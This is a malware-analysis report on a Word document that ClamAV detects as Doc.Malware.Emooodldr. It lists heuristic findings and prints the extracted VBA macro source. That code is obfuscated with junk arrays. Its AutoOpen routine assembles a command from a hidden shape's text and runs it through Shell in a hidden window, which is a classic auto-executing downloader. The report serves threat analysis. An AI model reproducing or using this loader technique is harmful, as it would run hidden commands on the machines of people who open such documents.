MALICIOUS
250
Risk Score
Heuristics 8
-
ClamAV: Doc.Malware.Emooodldr-6794661-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6794661-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
"l", "X", "un", "j", "z", "Cw", "OO", "Q") UfNoSUPc = Shell(TNwLBrGS + zKhijGAz + NFzjYKlE, GSwRRJDLLP) OmJvnkf = Array("M", "bb", "as", "s", "HE", "Vw", "iz", "A", _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() XCTTVt = Array("j", "w", "k", "H", "RO", "N", "J", "k", _ -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7710 bytes |
SHA-256: 91d00008beff1d3baa4f69d1462682ae04ac38af10e93a17a1951ef0501b363c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jSVtZvA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IWYjF()
Const GSwRRJDLLP = 345726549 - 345726549
fNcLpwK = Array("i", "nZ", "RT", "D", "M", "i", "i", "u", _
"Na", "f", "p", "Lv", "G", "m", "wu", "ND", _
"iU", "km", "jN", "Zi", "R", "l", "Kw", "zn", _
"WS", "l", "P", "k", "VE", "A", "sd", "UF", _
"O", "V", "Af", "O", "jf", "B", "w", "b", _
"X", "K", "w", "O", "G", "rh", "N", "OT", _
"z", "l", "Co", "u", "wD", "t", "Br", "lO", _
"X", "Y", "ZT", "C", "SO", "hw", "E", "h")
QVjHSPjE = Array("j", "fs", "EB", "mB", "Ha", "t", "Sw", "H", _
"HV", "cC", "f", "Jz", "nb", "uc", "jQ", "o", _
"AT", "pM", "Rz", "V", "ob", "DQ", "iV", "cB", _
"U", "Yw", "h", "z", "lh", "I", "NM", "YK", _
"Np", "IT", "V", "ln", "zz", "L", "nn", "S", _
"Xz", "t", "u", "X", "b", "R", "q", "MQ", _
"oL", "M", "p", "Vt", "XY", "T", "iq", "kO", _
"i", "Y", "L", "fj", "f", "XI", "G", "Lp")
TNwLBrGS = "" + BhAtVAZ + pcBRJ + Shapes("HfranINmmzmiBc").TextFrame.ContainingRange + swNEoUGt + DlEizWEc
fHwoYLIWz = Array("wt", "h", "f", "R", "A", "YB", "HG", "i", _
"H", "k", "N", "R", "AG", "h", "wI", "vI", _
"qG", "bs", "w", "F", "j", "K", "H", "cL", _
"DV", "f", "K", "TM", "sq", "w", "s", "a", _
"rv", "F", "d", "p", "Hb", "f", "N", "P", _
"aQ", "z", "kh", "f", "T", "hw", "z", "m", _
"Pp", "z", "v", "l", "M", "z", "BC", "KL", _
"zh", "w", "zV", "a", "oj", "a", "z", "Z")
DNfjdzq = Array("c", "tj", "Au", "bK", "z", "G", "aW", "V", _
"W", "Rj", "U", "YL", "D", "im", "fV", "h", _
"C", "zl", "q", "z", "F", "c", "fd", "fN", _
"WZ", "V", "G", "R", "d", "E", "T", "I", _
"l", "PO", "i", "F", "b", "D", "n", "Ir", _
"r", "dm", "BY", "Uw", "J", "W", "G", "A", _
"OT", "OP", "f", "O", "p", "v", "I", "c", _
"zB", "q", "K", "D", "Sr", "Ci", "Lc", "vR")
HJVUwM = Array("rh", "z", "zq", "HQ", "m", "X", "sS", "D", _
"qv", "om", "Pu", "nW", "b", "r", "in", "zU", _
"F", "V", "Qo", "QD", "t", "Iv", "fL", "h", _
"jT", "DK", "j", "N", "jD", "W", "iT", "Vb", _
"c", "Ua", "Jv", "zb", "S", "k", "XR", "KI", _
"C", "S", "Wl", "A", "O", "Gb", "j", "d", _
"w", "HO", "K", "lm", "L", "R", "S", "aM", _
"l", "X", "un", "j", "z", "Cw", "OO", "Q")
UfNoSUPc = Shell(TNwLBrGS + zKhijGAz + NFzjYKlE, GSwRRJDLLP)
OmJvnkf = Array("M", "bb", "as", "s", "HE", "Vw", "iz", "A", _
"B", "sr", "rO", "X", "X", "wj", "Y", "G", _
"r", "ZI", "Ji", "nP", "p", "f", "L", "jk", _
"j", "sU", "j", "p", "jV", "r", "J", "bb", _
"i", "z", "sG", "MC", "VW", "VC", "Nk", "z", _
"ms", "G", "sw", "Wd", "TT", "q", "Cz", "Z", _
"U", "T", "j", "p", "wz", "b", "v", "s", _
"z", "k", "j", "l", "V", "L", "Kl", "aU")
plPiwEpB = Array("f", "o", "f", "pd", "nK", "b", "t", "QJ", _
"jV", "EJ", "rP", "wh", "i", "Rv", "R", "t", _
"m", "wI", "Y", "X", "w", "vs", "l", "Ci", _
"oc", "i", "l", "bK", "o", "G", "i", "ls", _
"rC", "rS", "B", "p", "f", "D", "QF", "lF", _
"Xq", "DG", "jZ", "OV", "z", "m", "Kk", "cJ", _
"lI", "Ml", "pK", "Lf", "Y", "F", "l", "Wb", _
"az", "Hw", "a", "GC", "bs", "o", "u", "Dk")
siFbOR = Array("au", "f", "H", "jI", "cD", "Z", "G", "P", _
"aj", "FG", "EH", "w", "l", "zp", "h", "rw", _
"s", "jj", "j", "vp", "wM", "rL", "pQ", "Nz", _
"l", "N", "Dc", "V", "S", "L", "lN", "A", _
"Z", "V", "I", "A", "d", "sh", "j", "c", _
"c", "R", "Ck", "U", "tb", "a", "T", "b", _
"mu", "w", "nv", "cc", "Nj", "FX", "Aj", "Wb", _
"B", "fZ", "DP", "R", "vc", "zf", "dh", "I")
End Function
Sub AutoOpen()
XCTTVt = Array("j", "w", "k", "H", "RO", "N", "J", "k", _
"Q", "EV", "tC", "RA", "T", "VF", "MS", "vb", _
"vL", "L", "bb", "A", "S", "Dp", "pz", "tn", _
"P", "bo", "wa", "qL", "so", "tH", "H", "Hv", _
"vA", "SQ", "XT", "C", "If", "n", "t", "Ai", _
"B", "GP", "v", "iS", "j", "Q", "a", "a", _
"dU", "m", "Ff", "i", "w", "w", "R", "tV", _
"C", "C", "pF", "Gl", "H", "L", "w", "K")
fvfDhrDqK = Array("Gr", "X", "zW", "cU", "G", "EY", "nS", "A", _
"AR", "S", "cA", "lR", "CC", "R", "qq", "SS", _
"Bo", "J", "iD", "k", "KJ", "a", "E", "W", _
"h", "Dd", "k", "Gk", "bj", "LW", "N", "iB", _
"u", "jB", "sO", "ol", "Jv", "nw", "V", "r", _
"S", "J", "cw", "Ls", "X", "B", "IW", "Lr", _
"Q", "Kn", "ma", "QB", "F", "z", "bX", "P", _
"ff", "aQ", "uz", "bi", "h", "H", "v", "R")
tpudapH = Array("UE", "AS", "C", "Sk", "G", "qw", "W", "na", _
"Y", "Z", "f", "pC", "ZB", "rW", "F", "sG", _
"a", "Z", "zl", "s", "Hm", "j", "v", "Uz", _
"ZM", "fK", "X", "Uv", "i", "hO", "Bh", "D", _
"iz", "f", "zB", "aD", "qF", "zo", "Ot", "qj", _
"dZ", "US", "uQ", "ts", "PT", "YG", "R", "rU", _
"pA", "z", "T", "cD", "Ap", "u", "jA", "nq", _
"Mq", "Vr", "nF", "p", "I", "CU", "i", "zO")
cPNjhXTLz = Array("zv", "FY", "s", "M", "B", "cV", "Jz", "vX", _
"A", "DM", "A", "FT", "TC", "c", "hi", "QG", _
"i", "zi", "sI", "X", "Q", "Uw", "t", "VW", _
"S", "Rh", "Qt", "c", "S", "QG", "H", "i", _
"I", "iv", "D", "r", "Wn", "Jt", "l", "QQ", _
"Xw", "v", "D", "LN", "zn", "F", "Y", "wB", _
"WZ", "i", "jI", "OV", "rp", "sK", "m", "MS", _
"d", "Y", "a", "f", "Bm", "n", "w", "iG")
IWYjF
DazwJHj = Array("dO", "H", "Uw", "pX", "Jm", "K", "m", "wS", _
"w", "h", "Al", "A", "j", "Z", "SN", "c", _
"wA", "f", "z", "li", "t", "Z", "R", "fK", _
"f", "jo", "an", "k", "Dz", "Kp", "R", "Sp", _
"kO", "s", "D", "O", "z", "CC", "LO", "n", _
"b", "Gp", "RL", "k", "A", "M", "m", "Uj", _
"iX", "td", "Qv", "Nd", "Fo", "N", "dZ", "b", _
"BZ", "H", "Zh", "B", "hQ", "h", "zd", "OW")
YIRcTRG = Array("Rr", "R", "B", "S", "k", "J", "O", "vb", _
"js", "V", "j", "Nj", "wl", "SG", "J", "QS", _
"Xf", "D", "G", "HJ", "W", "i", "Nt", "VU", _
"z", "V", "X", "lC", "F", "i", "D", "N", _
"RM", "tF", "ac", "Vj", "NN", "w", "oF", "o", _
"YU", "wE", "s", "ac", "wi", "r", "rr", "rn", _
"E", "v", "sh", "O", "D", "l", "Iw", "W", _
"k", "uE", "Pi", "F", "z", "Q", "tH", "l")
DCbZSKp = Array("NY", "iv", "T", "IR", "Wq", "Ls", "mt", "f", _
"R", "z", "k", "zS", "P", "bC", "c", "Gq", _
"v", "m", "F", "Kr", "mf", "a", "G", "W", _
"Vn", "hp", "O", "Oq", "Pz", "Ds", "ni", "u", _
"ZA", "j", "zC", "v", "F", "l", "v", "i", _
"pM", "U", "Tn", "N", "cT", "Ik", "Oa", "J", _
"O", "zu", "Kq", "Az", "J", "Yi", "E", "u", _
"il", "m", "dw", "D", "Uw", "N", "UX", "z")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.